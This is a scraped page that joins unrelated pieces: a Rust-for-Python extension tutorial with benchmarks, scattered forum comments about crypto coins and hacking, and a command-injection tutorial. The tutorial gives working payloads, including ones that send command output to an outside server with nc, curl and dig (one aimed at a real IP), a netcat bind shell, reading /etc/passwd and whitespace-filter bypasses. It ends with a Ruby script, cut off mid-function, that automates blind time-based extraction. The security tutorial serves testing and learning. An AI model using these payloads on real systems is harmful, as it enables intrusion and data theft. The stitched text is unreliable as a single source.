    def count_doubles_regex(val):
        return len(double_re.findall(val))


    # Benchmark it
    # generate 1M of random letters to test it
    val = ''.join(random.choice(string.ascii_letters) for i in range(1000000))


    def test_pure_python(benchmark):
        benchmark(count_doubles, val)


    def test_regex(benchmark):
        benchmark(count_doubles_regex, val)

Run pytest to compare:

    $ pytest doubles.py
    =============================================================================
    platform linux -- Python 3.6.0, pytest-3.2.3, py-1.4.34, pluggy-0.4.
    benchmark: 3.1.1 (defaults: timer=time.perf_counter disable_gc=False min_roun
    rootdir: /Projects/rustpy, inifile:
    plugins: benchmark-3.1.1
    collected 2 items

    doubles.py ..
    -----------------------------------------------------------------------------
    Name (time in ms)          Min                Max                Mean
    -----------------------------------------------------------------------------
    test_regex            24.6824 (1.0)      32.3960 (1.0)      27.0167 (1.0)
    test_pure_python      51.4964 (2.09)     62.5680 (1.93)     52.8334 (1.96)
    -----------------------------------------------------------------------------

Let's take the Mean for comparison:

- Regexp – 27.0167 <– less is better
- Python Zip – 52.8334

Extending Python with Rust

Create a new crate

crate is how we call Rust packages. Having Rust installed (the recommended way is https://www.rustup.rs/; it is also available on Fedora and RHEL repositories by the rust-toolset), I used rustc 1.21.0. In the same folder run:

    cargo new pyext-myrustlib

It creates a new Rust project in that same folder called pyext-myrustlib containing the Cargo.toml (cargo is the Rust package manager) and also a src/lib.rs (where we write our library implementation).

Edit Cargo.toml

It will use the rust-cpython crate as dependency and tell cargo to generate a dylib to be imported from Python.

    [package]
    name = "pyext-myrustlib"
    version = "0.1.0"
    authors = ["Bruno Rocha <rochacbruno@gmail.com>"]

    [lib]
    name = "myrustlib"
    crate-type = ["dylib"]

    [dependencies.cpython]
    version = "0.1"
    features = ["extension-module"]

Edit src/lib.rs

What we need to do:

- Import all macros from the cpython crate.
- Take the Python and PyResult types from CPython into our lib scope.
- Write the count_doubles function implementation in Rust. Note that this is very similar to the pure Python version except for:
  - It takes a Python as first argument, which is a reference to the Python interpreter and allows Rust to use the Python GIL.
  - Receives a &str typed val as reference.
  - Returns a PyResult, which is a type that allows the raising of Python exceptions.
  - Returns a PyResult object in Ok(total) (Result is an enum type that represents either success (Ok) or failure (Err)), and as our function is expected to return a PyResult the compiler will take care of wrapping our Ok on that type (note that our PyResult expects a u64 as return value).
- Using the py_module_initializer! macro we register new attributes to the lib, including the __doc__, and also we add the count_doubles attribute referencing our Rust implementation of the function.
  - Attention to the names libmyrustlib, initlibmyrustlib, and PyInit.
  - We also use the try! macro, which is the equivalent to Python's try.. except.
  - Return Ok(()) – The () is an empty result tuple, the equivalent of None in Python.

    #[macro_use]
    extern crate cpython;

    use cpython::{Python, PyResult};

    fn count_doubles(_py: Python, val: &str) -> PyResult<u64> {
        let mut total = 0u64;

        // There is an improved version later on this post
        for (c1, c2) in val.chars().zip(val.chars().skip(1)) {
            if c1 == c2 {
                total += 1;
            }
        }

        Ok(total)
    }

    py_module_initializer!(libmyrustlib, initlibmyrustlib, PyInit_myrustlib, |py, m | {
        try!(m.add(py, "__doc__", "This module is implemented in Rust"));
        try!(m.add(py, "count_doubles", py_fn!(py, count_doubles(val: &str))));
        Ok(())
    });

Now let's build it with cargo

    $ cargo build --release
        Finished release [optimized] target(s) in 0.0 secs

    $ ls -la target/release/libmyrustlib*
    target/release/libmyrustlib.d
    target/release/libmyrustlib.so*  <-- Our dylib is here

Now let's copy the generated .so lib to the same folder where our doubles.py is located.

NOTE: on Fedora you must get a .so; on other systems you may get a .dylib and you can rename it, changing the extension to .so.

    $ cd ..
    $ ls
    doubles.py pyext-myrustlib/

    $ cp pyext-myrustlib/target/release/libmyrustlib.so myrustlib.so

    $ ls
    doubles.py myrustlib.so pyext-myrustlib/

Having the myrustlib.so in the same folder or added to your Python path allows it to be directly imported, transparently as if it were a Python module.
Importing from Python and comparing the results

Edit your doubles.py now importing our Rust implemented version and adding a benchmark for it.

    import re
    import string
    import random

    import myrustlib   # <-- Import the Rust implemented module (myrustlib.so)


    def count_doubles(val):
        """Count repeated pair of chars ins a string"""
        total = 0
        for c1, c2 in zip(val, val[1:]):
            if c1 == c2:
                total += 1
        return total


    double_re = re.compile(r'(?=(.)\1)')


    def count_doubles_regex(val):
        return len(double_re.findall(val))


    val = ''.join(random.choice(string.ascii_letters) for i in range(1000000))


    def test_pure_python(benchmark):
        benchmark(count_doubles, val)


    def test_regex(benchmark):
        benchmark(count_doubles_regex, val)


    def test_rust(benchmark):   # <-- Benchmark the Rust version
        benchmark(myrustlib.count_doubles, val)

Benchmark

    $ pytest doubles.py
    ==============================================================================
    platform linux -- Python 3.6.0, pytest-3.2.3, py-1.4.34, pluggy-0.4.
    benchmark: 3.1.1 (defaults: timer=time.perf_counter disable_gc=False min_round
    rootdir: /Projects/rustpy, inifile:
    plugins: benchmark-3.1.1
    collected 3 items

    doubles.py ...

    -----------------------------------------------------------------------------
    Name (time in ms)          Min                Max                Mean
    -----------------------------------------------------------------------------
    test_rust              2.5555 (1.0)       2.9296 (1.0)       2.6085 (1.0)
    test_regex            25.6049 (10.02)    27.2190 (9.29)     25.8876 (9.92)
    test_pure_python      52.9428 (20.72)    56.3666 (19.24)    53.9732 (20.69)
    -----------------------------------------------------------------------------

Let's take the Mean for comparison:

- Rust – 2.6085 <– less is better
- Regexp – 25.8876
- Python Zip – 53.9732

The Rust implementation can be 10x faster than the Python regex and 21x faster than the pure Python version. Interesting that the regex version is only 2x faster than pure Python 🙂

NOTE: Those numbers make sense only for this particular scenario; for other cases that comparison may be different.
Updates and Improvements

After this article was published I got some comments on r/python and also on r/rust. The contributions came as pull requests and you can send a new one if you think the functions can be improved.

Thanks to Josh Stone we got a better implementation for Rust which iterates the string only once, and also the Python equivalent.

Thanks to Purple Pixie we got a Python implementation using itertools; however this version is not performing any better and still needs improvements.

Iterating only once

    fn count_doubles_once(_py: Python, val: &str) -> PyResult<u64> {
        let mut total = 0u64;

        let mut chars = val.chars();
        if let Some(mut c1) = chars.next() {
            for c2 in chars {
                if c1 == c2 {
                    total += 1;
                }
                c1 = c2;
            }
        }

        Ok(total)
    }

    def count_doubles_once(val):
        total = 0
        chars = iter(val)
        # default of None so an empty string returns 0 instead of raising StopIteration
        c1 = next(chars, None)
        for c2 in chars:
            if c1 == c2:
                total += 1
            c1 = c2
        return total

Python with itertools

    import itertools

    def count_doubles_itertools(val):
        c1s, c2s = itertools.tee(val)
        next(c2s, None)

        total = 0
        for c1, c2 in zip(c1s, c2s):
            if c1 == c2:
                total += 1
        return total

New Results

    -------------------------------------------------------------------------------
    Name (time in ms)            Min                Max                Mean
    -------------------------------------------------------------------------------
    test_rust_once           1.0072 (1.0)       1.7659 (1.0)       1.1268 (1.0)
    test_rust                2.6228 (2.60)      4.5545 (2.58)      2.9367 (2.61)
    test_regex              26.0261 (25.84)    32.5899 (18.45)    27.2677 (24.20)
    test_pure_python_once   38.2015 (37.93)    43.9625 (24.90)    39.5838 (35.13)
    test_pure_python        52.4487 (52.07)    59.4220 (33.65)    54.8916 (48.71)
    test_itertools          58.5658 (58.15)    66.0683 (37.41)    60.8705 (54.02)
    -------------------------------------------------------------------------------

The new Rust implementation is 3x better than the old, but the python-itertools version is even slower than the pure Python one.

After adding the improvements to iterate the list of chars only once, Rust still has the advantage, from 1.1268 to 39.583.

Conclusion

Rust may not be yet the
general purpose language of choice by its level of complexity, and may not be the better choice yet to write common simple applications such as web sites and test automation scripts. However, for specific parts of the project where Python is known to be the bottleneck and your natural choice would be implementing a C/C++ extension, writing this extension in Rust seems easy and better to maintain. There are still many improvements to come in Rust and lots of other crates to offer Python <--> Rust integration. Even if you are not including the language in your tool belt right now, it is really worth keeping an eye open to the future!

References

The code snippets for the examples shown here are available in the GitHub repo: https://github.com/rochacbruno/rust-python-example.

The examples in this publication are inspired by the Extending Python with Rust talk by Samuel Cormier-Iijima at Pycon Canada. video here:

Also by My Python is a little Rust-y by Dan Callahan at Pycon Montreal. video here:

Other references:

- https://github.com/mitsuhiko/snaek
- https://github.com/PyO3/pyo3
- https://pypi.python.org/pypi/setuptools-rust
- https://github.com/mckaymatt/cookiecutter-pypackage-rust-cross-platform-publish
- http://jakegoulding.com/rust-ffi-omnibus/
- https://github.com/urschrei/polylabel-rs/blob/master/src/ffi.rs
- https://bheisler.github.io/post/calling-rust-in-python/
- https://github.com/saethlin/rust-lather

Join Community

Join the Rust community; you can find group links in https://www.rust-lang.org/en-US/community.html. If you speak Portuguese, I recommend you join https://t.me/rustlangbr, and there is the http://bit.ly/canalrustbr on Youtube.

Author

Bruno Rocha
Senior Quality Engineer at Red Hat
Teaching Python and Flask at CursoDePython.com.br
Fellow Member of Python Software Foundation
Member of RustBR study group
More info: http://about.me/rochacbruno and http://brunorocha.org

Source
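The Python variants compared in this post, gathered into one file as an added example (not the post's code and not the rochacbruno/rust-python-example repository): every implementation side by side, an agreement check, and a small timeit harness. It assumes the Rust module built as in the post is importable as myrustlib; if it is not, the Rust entry is skipped. Two edge cases the listings do not discuss are handled: the single-pass version needs a default for next() so the empty string returns 0 instead of raising StopIteration, and the regex must keep its zero-width lookahead so overlapping pairs are counted like the zip version ("aaa" holds two); a consuming pattern is included to show the undercount.

```python
"""Added example: count_doubles variants side by side, an agreement check and
a timeit harness. Not code from the post or its repository."""
import itertools
import re
import timeit

try:
    import myrustlib            # assumption: the module built in the post, on sys.path
except ImportError:             # not built: compare only the Python versions
    myrustlib = None


def count_doubles_zip(val):
    """Pairwise zip over the string and a one-character-shifted copy."""
    total = 0
    for c1, c2 in zip(val, val[1:]):
        if c1 == c2:
            total += 1
    return total


def count_doubles_once(val):
    """Single pass; next(chars, None) keeps the empty string from raising."""
    total = 0
    chars = iter(val)
    c1 = next(chars, None)
    for c2 in chars:
        if c1 == c2:
            total += 1
        c1 = c2
    return total


def count_doubles_itertools(val):
    """Two tee'd iterators, the second advanced by one."""
    c1s, c2s = itertools.tee(val)
    next(c2s, None)
    return sum(1 for c1, c2 in zip(c1s, c2s) if c1 == c2)


# Zero-width lookahead: the match consumes nothing, so "aaa" yields two hits.
DOUBLE_RE = re.compile(r"(?=(.)\1)")
# Consuming form: "aa" is eaten by the first match, so "aaa" yields only one.
NAIVE_RE = re.compile(r"(.)\1")


def count_doubles_regex(val):
    return len(DOUBLE_RE.findall(val))


def count_doubles_naive_regex(val):
    return len(NAIVE_RE.findall(val))


def all_variants(val):
    """Map each implementation name to its result for val."""
    results = {
        "zip": count_doubles_zip(val),
        "once": count_doubles_once(val),
        "itertools": count_doubles_itertools(val),
        "regex": count_doubles_regex(val),
    }
    if myrustlib is not None:
        results["rust"] = myrustlib.count_doubles(val)
    return results


def variants_agree(val):
    """True when every implementation returns the same count."""
    return len(set(all_variants(val).values())) == 1


def benchmark(val, number=3):
    """Seconds per implementation for `number` runs, measured with timeit."""
    funcs = {"zip": count_doubles_zip, "once": count_doubles_once,
             "itertools": count_doubles_itertools, "regex": count_doubles_regex}
    if myrustlib is not None:
        funcs["rust"] = myrustlib.count_doubles
    return {name: timeit.timeit(lambda f=fn: f(val), number=number)
            for name, fn in funcs.items()}


if __name__ == "__main__":
    import random
    import string
    sample = "".join(random.choice(string.ascii_letters) for _ in range(1_000_000))
    assert variants_agree(sample)
    for name, secs in sorted(benchmark(sample).items(), key=lambda kv: kv[1]):
        print(f"{name:10s} {secs * 1000 / 3:8.2f} ms per call")
```

The agreement check is worth keeping next to any benchmark of this kind: a faster variant that quietly counts differently (as the consuming regex does) is a bug, not an optimization.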
  19. 4 points
    https://explainshell.com/
  20. 4 points
    @robert2alin continuing from https://rstforums.com/forum/topic/107079-iphone-8-blacklist/?do=findComment&comment=655986 I've solved this one. Cheers!
  21. 4 points
    Bloody hackers, the future welfare cases... pick up a damn book and quit the nonsense. Online shop? Careful you don't receive something seasonal:
  22. 4 points
    Good excuse for the wife when she catches you talking to your mistress: The voices, man.. the voices.. #WeAreLegionForWeAreMany
  23. 4 points
    if it made you 50k just from links you wouldn't be selling it
  24. 4 points
  25. 3 points
    Who the hell watches kids making noise? Skill-wise the ceiling is garbage and it's not nice to watch like a professional match. (git gud kid) As entertainment it's even worse. 5 kids making noise into a 3-lei microphone from the market. You're not funny, there's no audio quality and no quality in gameplay skill either. If you want to be a youtuber, move to another segment or try to do much more original things.
  26. 3 points
    https://www.ripstech.com/php-security-calendar-2017/
  27. 3 points
    IOTA still has a long way to go up. I recommend it! They're serious and have partnerships with many companies. The situation looks similar to me to the early days of ETH. I initially bought at 16k satoshi, sold at 35k and now I'm looking to buy again because it seems to have stabilized around 24k satoshi. I'm also trying to accumulate BAT on dips because the price is very low at the moment and the project is really cool. Plus, the Brave browser runs excellently. Easy 10x in a few months.
  28. 3 points
  29. This post cannot be displayed because it is in a forum which requires at least 10 posts to view.
  30. 3 points
    In short, everyone who holds NXT coins will receive FOR FREE half their number in the new coin that is about to launch, which will be called IGNIS. I for one invested some money to catch the wave (it happens at Christmas) and I see it as a good opportunity to make some profit (the whole trick is knowing when to stop). This is roughly how the NXT coin evolved over the last 2 days: More details here: https://www.jelurida.com/ico
  31. 3 points
    why not go to the police and file a complaint; they are obliged to investigate etc. (or, if not, they'll guide you on what to do and how). if you get involved yourself, taking the phone apart or checking the software, you risk destroying evidence. PS: The situation you describe falls under a CRIMINAL case, not a CIVIL one. That is, it's the police's business, not your business with lawyers. Off: Man, how the soap operas have multiplied on this forum. Not a week goes by without a topic about cheating, divorces, betrayals, wiretapping, spying. Worse than Ochii din Umbra.
  32. 3 points
    fuck me, I went to sign up for volunteer organizations, and what I noticed is that, whatever they do, they have to throw an after party after doing that thing. you run a competition? well, obviously we have to throw an after party too. how the fuck can we do well as a collective, when we think subjectively and only care about ourselves.
  33. 3 points
    I like it with a happy ending. 😏
  34. 3 points
    "Real smart contracts" "20 000 TPS" "More info soon" Sounds like a scam. Making such promises without putting out even an idea of a specification or validation of your "blockchain". Sorry for the offtopic. I just think it sounds too good to be real. Edit: If you read their whitepaper you'll notice all the nodes in the network are owned by them, and a node has to be validated and signed by them. So decentralization and the coin's value went down the drain when all the nodes are owned by them. Ps: they can rewrite the blockchain if they feel like it. Plus the software isn't open source.
  35. 3 points
    A command injection is a class of vulnerabilities where the attacker can control one or multiple commands that are being executed on a system. This post will go over the impact, how to test for it, defeating mitigations, and caveats.

Before diving into command injections, let's get something out of the way: a command injection is not the same as a remote code execution (RCE). The difference is that with an RCE, actual programming code is executed, whereas with a command injection, it's an (OS) command being executed. In terms of possible impact, this is a minor difference, but the key difference is in how you find and exploit them.

Setting up

Let's start by writing two simple Ruby scripts that you can run locally to learn finding and exploiting command injection vulnerabilities. I used Ruby 2.3.3p222. Below is ping.rb.

    puts `ping -c 4 #{ARGV[0]}`

This script will ping the server that's being passed to the script as argument. It will then return the command output on the screen. Example output below.

    $ ruby ping.rb '8.8.8.8'
    PING 8.8.8.8 (8.8.8.8): 56 data bytes
    64 bytes from 8.8.8.8: icmp_seq=0 ttl=46 time=23.653 ms
    64 bytes from 8.8.8.8: icmp_seq=1 ttl=46 time=9.111 ms
    64 bytes from 8.8.8.8: icmp_seq=2 ttl=46 time=8.571 ms
    64 bytes from 8.8.8.8: icmp_seq=3 ttl=46 time=20.565 ms

    --- 8.8.8.8 ping statistics ---
    4 packets transmitted, 4 packets received, 0.0% packet loss
    round-trip min/avg/max/stddev = 8.571/15.475/23.653/6.726 ms

As you can see, it executed ping -c 4 8.8.8.8 and displayed the output on the screen. Here's another script that will be used in the blog post: server-online.rb.

    puts `ping -c 4 #{ARGV[0]}`.include?('bytes from') ? 'yes' : 'no'

This script will determine whether the server is online based on an ICMP response (ping). If it responds to the ping request, it'll display yes on the screen. In case it doesn't, it'll display no. The output of the command isn't returned to the user. Example output below.
    $ ruby server-on.rb '8.8.8.8'
    yes
    $ ruby server-on.rb '8.8.8.7'
    no

Testing

One of the best ways to detect a first-order command injection vulnerability is trying to execute a sleep command and determine if the execution time increases. To start with this, let's establish a time baseline for the ping.rb script:

    $ time ruby ping.rb '8.8.8.8'
    PING 8.8.8.8 (8.8.8.8): 56 data bytes
    ...
    0.09s user 0.04s system 4% cpu 3.176 total

Notice that executing the script takes about 3 seconds. Now let's determine if the script is vulnerable to a command injection by injecting a sleep command.

    $ time ruby ping.rb '8.8.8.8 && sleep 5'
    PING 8.8.8.8 (8.8.8.8): 56 data bytes
    ...
    0.10s user 0.04s system 1% cpu 8.182 total

The script will now execute the command ping -c 4 8.8.8.8 && sleep 5. Notice the execution time again: it jumped from ~3 seconds to ~8 seconds, which is an increase of exactly 5 seconds. There can still be unexpected delays on the internet, so it's important to repeat the injection and play with the amount of seconds to make sure it's not a false positive. Let's determine whether the server-online.rb script is vulnerable, too.

    $ time ruby server-online.rb '8.8.8.8'
    yes
    0.10s user 0.04s system 4% cpu 3.174 total

    $ time ruby server-online.rb '8.8.8.8 && sleep 5'
    yes
    0.10s user 0.04s system 1% cpu 8.203 total

Again, the baseline shows executing a normal request takes about 3 seconds. Adding && sleep 5 to the command increases the time to 8 seconds. Depending on the command being executed, the sleep command may be injected differently. Here are a few payloads that you can try when looking for command injections (they all work):

    time ruby ping.rb '8.8.8.8`sleep 5`'

When a command line gets parsed, everything between backticks is executed first. Executing echo `ls` will first execute ls and capture its output. It'll then pass the output to echo, which displays the output of ls on the screen. This is called command substitution.
Since execution of the command between backticks takes precedence, it doesn't matter if the command executed afterwards fails. Below is a table of commands with injected payloads and their result. The injected payload is marked in green.

    Command                                  Result
    ping -c 4 8.8.8.8`sleep 5`               sleep command executed, command substitution works in command line.
    ping -c 4 "8.8.8.8`sleep 5`"             sleep command executed, command substitution works in complex strings (between double quotes).
    ping -c 4 $(echo 8.8.8.8`sleep 5`)       sleep command executed, command substitution works in command substitution when using a different notation (see example below).
    ping -c 4 '8.8.8.8`sleep 5`'             sleep command not executed, command substitution does not work in simple strings (between single quotes).
    ping -c 4 `echo 8.8.8.8`sleep 5``        sleep command not executed, command substitution does not work when using the same notation.

    time ruby ping.rb '8.8.8.8$(sleep 5)'

This is a different notation for command substitution. This may be useful when backticks are filtered or encoded. When using command substitution to look for command injections, make sure to test both notations to avoid true negatives in case the payload is already being substituted (see last example in the table above).

    time ruby ping.rb '8.8.8.8; sleep 5'

Commands are executed in a sequence (left to right) and they can be separated with semicolons. When a command in the sequence fails it won't stop executing the other commands. Below is a table of commands with injected payloads and their result. The injected payload is marked in green.

    Command                                  Result
    ping -c 4 8.8.8.8;sleep 5                sleep command executed, sequencing commands works when used on the command line.
    ping -c 4 "8.8.8.8;sleep 5"              sleep command not executed, the additional command is injected in a string, which is passed as argument to the ping command.
    ping -c 4 $(echo 8.8.8.8;sleep 5)        sleep command executed, sequencing commands works in command substitution.
    ping -c 4 '8.8.8.8;sleep 5'              sleep command not executed, the additional command is injected in a string, which is passed as argument to the ping command.
    ping -c 4 `echo 8.8.8.8;sleep 5`         sleep command executed, sequencing commands works in command substitution.

    time ruby ping.rb '8.8.8.8 | sleep 5'

Command output can be piped, in sequence, to other commands. When executing cat /etc/passwd | grep root, it'll capture the output of the cat /etc/passwd command and pass it to grep root, which will then show the lines that match root. When the first command fails, it'll still execute the second command. Below is a table of commands with injected payloads and their result. The injected payload is marked in green.

    Command                                  Result
    ping -c 4 8.8.8.8 | sleep 5              sleep command executed, piping output works when used on the command line.
    ping -c 4 "8.8.8.8 | sleep 5"            sleep command not executed, the additional command is injected in a string, which is passed as argument to the ping command.
    ping -c 4 $(echo 8.8.8.8 | sleep 5)      sleep command executed, piping output works in command substitution.
    ping -c 4 '8.8.8.8 | sleep 5'            sleep command not executed, the additional command is injected in a string, which is passed as argument to the ping command.
    ping -c 4 `echo 8.8.8.8 | sleep 5`       sleep command executed, piping output works in command substitution.

Exploiting

To exploit the vulnerability for evidence is to determine whether it's a generic or blind command injection. The difference between the two is that a blind command injection doesn't return the output of the command in the response. A generic command injection would return the output of the executed command(s) in the response. The sleep command is often a good proof of concept for either flavor. However, if you need more proof, execute id, hostname, or whoami and use the output as additional proof. The server's hostname is useful to determine how many servers are affected and helps the vendor to get a sense of impact faster.
Important: needless to say, most companies don't appreciate you snooping around on their systems. Before exploiting the vulnerability to pivot into something else, ask permission from the company. In nearly all situations, proving that you can execute arbitrary but harmless commands like sleep, id, hostname or whoami is enough to prove impact to the affected company.

Exploiting generic command injection

This is usually pretty straightforward: the output of any injected command will be returned to the user:

    $ ruby ping.rb '8.8.8.8 && whoami'
    PING 8.8.8.8 (8.8.8.8): 56 data bytes
    64 bytes from 8.8.8.8: icmp_seq=0 ttl=46 time=9.008 ms
    64 bytes from 8.8.8.8: icmp_seq=1 ttl=46 time=8.572 ms
    64 bytes from 8.8.8.8: icmp_seq=2 ttl=46 time=9.309 ms
    64 bytes from 8.8.8.8: icmp_seq=3 ttl=46 time=9.005 ms

    --- 8.8.8.8 ping statistics ---
    4 packets transmitted, 4 packets received, 0.0% packet loss
    round-trip min/avg/max/stddev = 8.572/8.973/9.309/0.263 ms
    jobert

The red part shows the output of the ping command. The green text is the output of the whoami command. From this point, you can gather evidence for your proof of concept. Again, stick to harmless commands.

Exploiting blind command injection

With blind command injections the output isn't returned to the user, so we should find other ways to extract the output. The most straightforward technique is to offload the output to your server. To simulate this, run nc -l -n -vv -p 80 -k on your server and allow inbound connections on port 80 in your firewall.
Once you've set up the listener, use nc, curl, wget, telnet, or any other tool that sends data to the internet, to send the output to your server:

    $ ruby server-online.rb '8.8.8.8 && hostname | nc IP 80'
    yes

Then observe a connection being made to your server that shows the output of the hostname command:

    $ nc -l -n -vv -p 80 -k
    Listening on [0.0.0.0] (family 0, port 81)
    Connection from [1.2.3.4] port 80 [tcp/*] accepted (family 2, sport 64225)
    hacker.local

In the example above, nc is used to send the output of the command to your server. However, nc might be deleted or unable to execute. To avoid going down a rabbit hole, there are a few simple payloads to determine if a command exists. In case any of the commands increases the time by 5 seconds, you know the command exists.

    curl -h && sleep 5
    wget -h && sleep 5
    ssh -V && sleep 5
    telnet && sleep 5

When you've determined a command exists, you can use any of those commands to send the output of a command to your server, like this:

    whoami | curl http://your-server -d @-
    wget http://your-server/$(whoami)
    export C=whoami | ssh user@your-server (set up the user account on your-server to authenticate without a password and log every command being executed)

Even though the server-online.rb script doesn't output the result of the hostname command, the output can be sent to a remote server and obtained by an attacker.

In some cases, outbound TCP and UDP connections are blocked. It's still possible to extract the output in that case; we just have to do a little bit more work. In order to extract the output, we have to guess the output based on something that we can change. In this case, the execution time can be increased using the sleep command. This can be used to extract the output. The trick here is to pass the result of a command to the sleep command. Here's an example: sleep $(hostname | cut -c 1 | tr a 5). Let's analyze this for a moment. It's executing the hostname command. Let's assume it returns hacker.local.
It'll take that output and pass it to cut -c 1. This will take the first character of hacker.local, which is the character h. It passes it to tr a 5, which will replace the character a with a 5 in the output of the cut command (h). The output of the tr command is then passed to the sleep command, resulting in sleep h being executed. This will immediately error, since sleep can only take a number as first argument. The goal is then to iterate over the characters with the tr command. Once you execute sleep $(hostname | cut -c 1 | tr h 5), the command will take 5 seconds longer to execute. This is how you determine that the first character is an h. Once you've guessed a character, increase the number you pass to the cut -c command, and repeat. Here's a table with the commands to determine the output:

    Command                                                                  Time  Result
    ruby server-online.rb '8.8.8.8;sleep $(hostname | cut -c 1 | tr a 5)'    3s    -
    ruby server-online.rb '8.8.8.8;sleep $(hostname | cut -c 1 | tr h 5)'    8s    h
    ruby server-online.rb '8.8.8.8;sleep $(hostname | cut -c 2 | tr a 5)'    8s    a
    ruby server-online.rb '8.8.8.8;sleep $(hostname | cut -c 3 | tr a 5)'    3s    -
    ruby server-online.rb '8.8.8.8;sleep $(hostname | cut -c 3 | tr c 5)'    8s    c

To determine how many characters you need to guess: pipe the output of hostname to wc -c and pass that to the sleep command. hacker.local is 12 characters. The hostname command returns the hostname and a new line, so wc -c will return 13. We established that normally, the script takes 3 seconds to complete.

    $ time ruby server-online.rb '8.8.8.8 && sleep $(hostname | wc -c)'
    yes
    0.10s user 0.04s system 0% cpu 16.188 total

The payload above shows that the script now takes 16 seconds to complete, which means the output of hostname is 12 characters: 16 - 3 (baseline) - 1 (new line) = 12 characters. When executing this payload on a web server, know that the output may change: the length of the hostname could change when requests are handled by different servers.
The technique above works fine for small outputs, but can take a long time for reading a file. Some of the following methods can be pretty intrusive, so always make sure the company has given you a thumbs up before using more invasive extraction methods. In case outbound connections are blocked and the output is too long to read, here are a few other tricks to try (useful during CTFs):

- Run a port scan on the server and, based on the exposed services, determine a way to extract the output.
  FTP: try writing the file to a directory you can download files from.
  SSH: try writing the output of the command to the MOTD banner, then simply SSH to the server.
  Web: try writing the output of the command to a file in a public directory (/var/www/).
- Spawn a shell on a port that can be reached from the outside (only available in netcat builds compiled with the -e option): nc -l -n -vv -p 80 -e /bin/bash (unix) or nc -l -n -vv -p 80 -e cmd.exe (windows).
- Do a DNS query with dig or nslookup to send the output to port 53 (UDP): dig `hostname` @your-server or nslookup `hostname` your-server. The output can be captured with nc -l -n -vv -p 53 -u -k on your server. This often works because outbound DNS traffic is usually allowed. Check out this tweet on how to offload file contents with dig.
- Change the ICMP packet size when pinging your server to offload data. tcpdump can be used to capture the data. Check out this tweet on how to do this.

There are plenty of other ways, but it often depends on what kind of options the server gives you. The techniques shown above are the most common when exploiting command injection vulnerabilities. The key is to use what you have to extract the output!

Defeating mitigations

Sometimes mitigations have been put in place, which may cause the above techniques not to work. One of the mitigations I've seen over the years is a restriction on whitespace in the payload. Luckily, there's something called brace expansion that can be used to create payloads without whitespace.
Below is ping-2.rb, the second version of ping.rb. Before passing the user input to the command, it removes all whitespace from the input:

    puts `ping -c 4 #{ARGV[0].gsub(/\s+?/,'')}`

When 8.8.8.8 && sleep 5 is passed as the argument, it executes ping -c 4 8.8.8.8&&sleep5, which results in an error saying that the command sleep5 isn't found. There's an easy workaround using brace expansion, which the shell expands to sleep 5 before running it:

    $ time ruby ping-2.rb '8.8.8.8;{sleep,5}'
    ...
    0.10s user 0.04s system 1% cpu 8.182 total

Here's a payload that sends the output of a command to an external server without using whitespace:

    $ ruby ping.rb '8.8.8.8;hostname|{nc,192.241.233.143,81}'
    PING 8.8.8.8 (8.8.8.8): 56 data bytes
    ...

Or to read /etc/passwd:

    $ ruby ping.rb '8.8.8.8;{cat,/etc/passwd}'
    PING 8.8.8.8 (8.8.8.8): 56 data bytes
    64 bytes from 8.8.8.8: icmp_seq=0 ttl=46 time=9.215 ms
    64 bytes from 8.8.8.8: icmp_seq=1 ttl=46 time=10.194 ms
    64 bytes from 8.8.8.8: icmp_seq=2 ttl=46 time=10.171 ms
    64 bytes from 8.8.8.8: icmp_seq=3 ttl=46 time=8.615 ms

    --- 8.8.8.8 ping statistics ---
    4 packets transmitted, 4 packets received, 0.0% packet loss
    round-trip min/avg/max/stddev = 8.615/9.549/10.194/0.668 ms
    ##
    # User Database
    #
    # Note that this file is consulted directly only when the system is running
    # in single-user mode.  At other times this information is provided by
    # Open Directory.
    ...

One caveat: brace expansion is a bash (and zsh) feature, and Ruby's backticks hand a command line containing shell metacharacters to /bin/sh. The trick works where /bin/sh is bash, as on the macOS box the output above comes from, but not where /bin/sh is dash (Debian, Ubuntu). There, ${IFS} is the usual whitespace substitute, e.g. cat${IFS}/etc/passwd, since the variable name contains no whitespace but expands to it.

Whenever a command is executed with user input, mitigations have to be put in place by the developer. Developers take different routes to implement mitigations, so it's up to you to discover what they did and how to work around them. Happy hacking!

Jobert.

Source :
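The character-by-character timing table earlier in this post is tedious to work through by hand. The script below is an added example, not code from the original post, that automates the same blind extraction in Ruby against a timing oracle. It assumes (my assumptions, not the page's) that the injection point is the first argument of a local script such as server-online.rb, that a clean run takes about 3 seconds and that a correct guess adds 5. It also goes one step beyond the table: every hit is re-checked with a second delay value, because a digit in the output is a valid sleep argument on its own and would otherwise look like a hit for every guess. The simulated oracle is constructed for offline runs; passing `live` times the real script instead.

```ruby
#!/usr/bin/env ruby
# Added example, not code from the original post: automating the blind,
# time-based extraction of `hostname` described in the post.
#
# Assumptions (mine, not the page's): the injection point is the first
# argument of a local script such as server-online.rb, a clean run takes
# BASELINE seconds, and a correct guess adds DELAY seconds.

BASELINE  = 3.0  # seconds the command takes with no sleep injected
DELAY     = 5    # seconds added by a correct guess
CONFIRM   = 7    # second delay value used to re-check a hit
TOLERANCE = 1.0  # allowed timing jitter, in seconds
CHARSET   = ('a'..'z').to_a + ('0'..'9').to_a + ['.', '-']

# Argument that makes the target sleep `delay` seconds only when character
# `pos` (1-based) of the hostname equals `guess`; on a mismatch sleep gets a
# non-numeric argument and fails immediately.
def char_payload(pos, guess, delay = DELAY)
  "8.8.8.8;sleep $(hostname | cut -c #{pos} | tr '#{guess}' #{delay})"
end

# Argument that makes the target sleep for the byte count of `hostname`
# (wc -c includes the trailing newline).
def length_payload
  "8.8.8.8;sleep $(hostname | wc -c)"
end

# True when the measured run time is BASELINE + expected, within tolerance.
def delayed_by?(elapsed, expected)
  (elapsed - BASELINE - expected).abs <= TOLERANCE
end

# Number of characters in the hostname, not counting the newline.
def extract_length(oracle)
  (oracle.call(length_payload) - BASELINE).round - 1
end

# Recover the hostname one character at a time. A hit is accepted only after
# it reproduces with a different delay value: a digit in the output is a
# valid sleep argument by itself, so '5' would otherwise pass as a hit for
# every guess when DELAY is 5.
def extract_hostname(oracle, length)
  (1..length).map do |pos|
    hit = CHARSET.find do |c|
      delayed_by?(oracle.call(char_payload(pos, c)), DELAY) &&
        delayed_by?(oracle.call(char_payload(pos, c, CONFIRM)), CONFIRM)
    end
    hit || '?'
  end.join
end

# Offline stand-in for the timing oracle: emulates what the injected pipeline
# does for a constructed hostname and returns the run time in seconds.
def simulated_oracle(hostname)
  lambda do |payload|
    out = hostname + "\n"
    delay =
      if (m = payload.match(/cut -c (\d+) \| tr '(.)' (\d+)/))
        ch = out[m[1].to_i - 1].to_s
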